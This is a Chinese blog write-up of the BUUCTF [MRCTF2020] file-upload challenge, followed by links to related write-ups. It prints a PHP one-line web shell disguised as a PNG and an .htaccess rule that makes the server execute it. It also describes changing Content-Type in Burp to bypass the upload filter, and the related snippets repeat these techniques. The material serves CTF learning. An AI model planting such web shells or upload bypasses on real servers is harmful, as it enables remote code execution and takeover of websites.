Buuctf:[MRCTF2020]你传你呢

最新推荐文章于 2024-11-10 17:34:04 发布
原创 最新推荐文章于 2024-11-10 17:34:04 发布 · 433 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章讲述了在靶机挑战中遇到的图片上传问题,由于文件大小限制无法上传正常图片。作者通过创建一句话木马并伪装成.png文件,然后利用.htaccess文件修改处理方式为PHP,最终成功执行代码并连接蚁剑获取flag。

这名字怎么还骂人呢?
打开靶机
在这里插入图片描述
这个题特别坑人。我们先上传一个图片试试。
在这里插入图片描述
上传不成功。当场给我干蒙了。正常图片也不能传?后来看别人的wp才知道这一题限制文件大小。
好了我们言归正传。思路还是上传一句话木马,链接蚁剑。先编写一句话木马

GIF89a
<?php @eval($_POST['wz']); ?>

然后改文名件改为a.png`然后上传。
然后你会发现无论你怎么改后缀,怎么改语法,就是无法链接蚁剑。说明我们的一句话木马没有运行。我们就得尝试用.user.iniwen文件或者.htaccess文件把我们传入的php代码执行了。我们也不知道网站目录上有没有php文件所以我们尝试用.htaccess文件。
详情可见
我们创建一个名为:

.htaccess` 的文件,内容为:

<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch

然后注意这里的那个a.png必须和你上传的文件名相同。
我们上传.htaccess。
在这里插入图片描述
穿不进去。我们打开bp抓包。
在这里插入图片描述
把这里改为image/png来绕过检查。
在这里插入图片描述
成功。然后我们上传我们的一句话木马文件a.png。
在这里插入图片描述
好的,可以看到文件路径为/upload/17f10253549cad63de6355a3b577ad74/a.png。我们打开蚁剑,添加数据。
在这里插入图片描述
欧克,链接成功添加数据,得到flag。
在这里插入图片描述

寡人略秀
关注
BUUCTF [MRCTF2020]Ezpop
weixin_73399382的博客
07-24 1068
b->source->str = $c中$b->source已经成为一个新的Show实例对象,通过该对象访问str,为其赋值为$c(Test类的对象),又因为Test类中访问不到source资源从而触发get方法。$b->source = new Show()因为通过$b这个对象进行访问的,所以需要source赋值一个新的Show对象,用来触发__toString方法。$c->p = $a将Test中的p赋值为一个Modify对象,用来触发invoke方法。得到一串base64。
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞 CTF-Web
m0_72904009的博客
06-04 616
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 4887
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 802
考点:.htaccess文件上 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
java中实体类中实现Serializable接口的作用
诚的博客
10-15 1168
在开发中 我们看到实体类实现Serializable接口 还会写上下面一句话 private static final long serialVersionUID = 1L; 它的作用是实现序列化与反序列化 (1)Java序列化就是指把Java对象转换为字节序列的过程 Java反序列化就是指把字节序列恢复为Java对象的过程。 (2)序列化最重要的作用:在递和保存对象时.保证对象的完整性和可递性。对象转换为有序字节流,以便在网络上输或者保存在本地文件中。 ...
buuctf-[MRCTF2020]你你呢(小宇特详解)
小宇的web博客
01-26 1954
buuctf-[MRCTF2020]你你????呢(小宇特详解) 这里先试着修改后缀进行黑名单绕过,然而不行 这里的正确方法是进行.htaccess绕过 这里先上一个.htaccess文件 <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 注意:这里上.htaccess文件的时候一定要抓包将content-type的值修改为image/png 然后上一个1.png <?php
[MRCTF2020]你你呢
weixin_51019270的博客
03-07 775
[MRCTF2020]你你????呢 WP 知识点 htaccess文件简介 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 通常,htaccess使用的语法和主配置文件一样 在这道题,htaccess文件的作用仅仅是让服务器去
BUUCTF [MRCTF2020]Transform1
2301_77039831的博客
09-06 544
首先校验了输入长度必须为33,然后进行了取值和赋值,通过查看这个byte和dword可以得到两串数字,所以我们需要对这个40f0e0的字符串进行逆向处理。shift+e将这些数组提取出来,把其中的0x00删了就行了,可以使用。无壳,用ida64打开,直接查看main函数。提取出后进行逆向脚本编写。
buuctfMRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1507
真的很详细
BUUCTF-[MRCTF2020]Ezaudit 1
dian的博客
11-10 758
不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。访问解压得到index.php,打开就是源码访问解压得到index.php,打开就是源码。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 2463
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
热门推荐
weixin_44632787的博客
06-19 1万+
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF WEB [MRCTF2020]你你*呢
Y1da的博客
04-18 536
BUUCTF WEB [MRCTF2020]你你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上各种php文件后缀均被过滤,尝试上.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 6529
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
buuctf[mrctf2020]ezmisc 1
最新发布
06-22
### BUUCTF MRCTF2020 ezmisc 解题思路 BUUCTF中的MRCTF2020赛事包含多个misc类题目,其中`ezmisc`是一个典型的杂项(miscellaneous)挑战。以下是针对该题目的解题思路及可能的资源参考。 #### 题目分析 `ezmisc`...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值